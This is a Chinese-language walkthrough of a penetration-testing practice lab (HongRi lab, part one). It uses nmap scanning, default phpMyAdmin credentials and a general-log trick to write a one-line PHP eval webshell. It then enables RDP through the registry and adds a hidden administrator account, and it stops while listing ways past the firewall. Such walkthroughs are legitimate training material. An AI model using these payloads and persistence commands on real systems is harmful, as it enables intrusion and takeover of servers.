红⽇安全靶机实战(⼀)
0x01 ⼊侵web服务器
0x 1.1 信息收集
⾸先使⽤ nmap 来扫描ip 段存活的主机
nmap -sn 192.168.127.0/24
这⾥⽹上有的⽤ netdiscover 来扫描,其实和 nmap -sn 是⼀样的,都是通过arp 来实现扫描。
然后接着nmap 激进模式扫端⼝:
nmap -A -T4 192.168.127.154
发现80端⼝,浏览器访问,发现是phpStudy 搭建的环境,⽽且⽹站根路径是C:/php/WWW:
0x 1.2 写webshell并连接
phpstudy 默认⾃带的 phpmyadmin 可以⽤来管理数据库,默认密码是root/root 。测试⼀下,发现密码是默认密码,成功登录:
然后就是利⽤phpmyadmin 写 shell 了:
来到变量处,修改general log 和 general log file 的值:
然后执⾏ 语句:
SELECT "<?php @eval($_POST[1]);?>";
然后蚁剑连接:(kali 需要⾃⼰⼿动从github上⾯安装蚁剑,遇到⼀个问题就是加载器安装源码的时候 会报 not found,是因为蚁剑源码被删了。解决⽅法是把 ⾃⼰ windows 中蚁剑的源码 拷贝到 kali 中 ,然后再⽤加载器加载)
虚拟终端也好使,没有设置什么disable_function
0x02 ⼊侵内⽹
从虚拟终端返回的信息可以看到是 windows 系统:
那么windows 系统,我们尝试看是否可以远程连接。【有⼀个最快的⽅法就是直接使⽤rdpwrap ⼯具中的 RDPWInst ,不仅可以开启rdp 服务,开启防⽕墙规则,还可以允许⾮服务器版本windows多⽤户登录。】
查看3389 端⼝,发现并没有开启:
使⽤如下命令开启(适⽤于 win7,xp,2008 , 关闭则把0换成1):
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t R
EG_DWORD /d 00000000 /f
用phpstudy搭建网站添加⽤户:
net user test @!ke123 /add # 添加账户密码
net localgroup administrators test /add # 给test账户添加为管理员权限
net user test# 查询是否成功添加test⽤户
kali 安装远程桌⾯连接⼯具:
apt-get install rdesktop
但是直接连接失败。
zmap 扫3389端⼝:
发现3389 是 filtered 状态,估计是防⽕墙的原因。
果然,设置了允许被连接程序的⽩名单,⽽远程桌⾯不在⽩名单内。0x 2.1 关闭防⽕墙,允许3389 连接
此时⼀般可以有如下思路:
1.反弹⼀个msf的shell回来,尝试打开指定的端⼝
2.使⽤命令⾏直接添加规则允许3389端⼝流量
3.尝试使⽤隧道连接3389
我们⼀个个来试⼀试:
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论